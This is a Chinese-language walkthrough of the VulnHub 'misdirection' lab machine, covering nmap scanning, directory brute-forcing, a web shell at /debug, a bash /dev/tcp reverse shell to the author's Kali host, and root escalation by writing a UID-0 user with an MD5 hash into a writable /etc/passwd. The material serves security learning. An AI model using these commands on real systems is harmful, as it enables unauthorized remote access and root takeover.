vulnhub靶机-misdirection（渗透优先级抉择&passwd修改提权&shell交互性探讨）#

声明#

本文为个人跟随b站up主红队笔记学习vulnhub的misdirection靶机的复现通关记录，旨在分享靶机和记录学习心得体会，讲解若有谬误之处欢迎指正。
该靶机下载地址为’https://vulnhub.com/entry/misdirection-1,371/‘

渗透流程#

在vmware部署靶机并开机后，打开kali对靶机进行信息收集，使用nmap执行nmap -sn 192.168.245.0/24(请替换成你的网段)进行主机发现，发现图中的192.168.245.167为靶机。（192.168.245.136为我的kali虚拟机的地址）并进行端口发现，执行nmap --min-rate 10000 -p- 192.168.245.167，并对开放端口记录用于后续渗透，发现22、80，3306，8080端口。
对端口进行详细扫描，执行nmap -sT -sV -sC -O -p22,80,3306,8080 192.168.245.167，得到端口详细服务内容和系统版本。
执行nmap --script=vuln -p22,80,110,143 192.168.245.167用脚本扫一下漏洞，扫描时间比较长，一会回来看看。
访问一下80端口，简要对其中的链接进行访问，没有很明显的突破口，尝试目录爆破。
sudo gobuster dir -u http://192.168.245.167 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt目录爆破，因为返回状态码问题，无法爆破80端口，先试试修改为8080端口爆破，一个个进行访问。
访问到/wordpress，仿佛没有很明显突破口。
访问到/debug，试了试发现是个www-data用户的可交互shell。
回看到脚本扫描以及完成，有些80端口的目录可以访问。
发现路径均被封闭，没有办法继续渗透。
在kali打开1234端口监听，执行 bash -c "/bin/bash -i >& /dev/tcp/192.168.245.136/1234 0>&1"将shell重定向到kali，因为网页shell通常不稳定无回显，无法使用 vim、su 等命令，所以优先反弹到Kali监听端，获得更可控的 shell。

提权过程#

查看到sudo -l，发现有brexit用户的/bin/bash权限，通过sudo -u brexit /bin/bash可以切换到brexit用户。
在查看文件的时候，发现了.viminfo文件，该文件记录用户vim编辑记录，打开看看。
有一条/etc/passwd的修改记录，这意味着该用户可能有修改/etc/passwd的权限。
果然如此，我们可以尝试写入一个新的用户来提权。
通过openssl获取md5加密密码，将用户按照格式拼接设定密码及root用户后面的内容，例owo:$1$7XYL0jN/$YnDU6e5tSnybrmfipZJji/:0:0:root:/root:/bin/bash。
shell交互性比较弱，使用记忆操作将密码输入进去，cat一下发现成功写入。
切换用户，输入密码，成功提权至root。

其它补充与收获总结#

通过渗透，我们意识到brexit为网站管理员，通过.viminfo查看历史记录只是其中一种思路，同样如果执行find / -writable -type f -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null等方式来筛选，也可列出可写文件/etc/passwd。
在/etc/passwd中，格式详细解释为：用户名:密码占位符:UID:GID:注释信息:主目录:登录Shell，其中密码解释为： $1$ 表示使用 MD5 加密算法,7XYL0jN/ 是加密用的盐值,后面的字符串是root密码的加密结果，共同拼凑为密码占位符。
对于交互性弱的shell，需要对编辑器有足够熟悉，可以通过直接背诵操作来完成填写（如vi后按O直接粘贴，按esc后输入wq并回车），交互性差的原因如下图。（大模型生成仅供参考）
提升交互性也可以通过指令提升，可以学习文章’https://blog.csdn.net/2301_79518550/article/details/144730328’,分析了伪终端的原理并提供许多解决方案，很好的解决交互性影响使用的情况。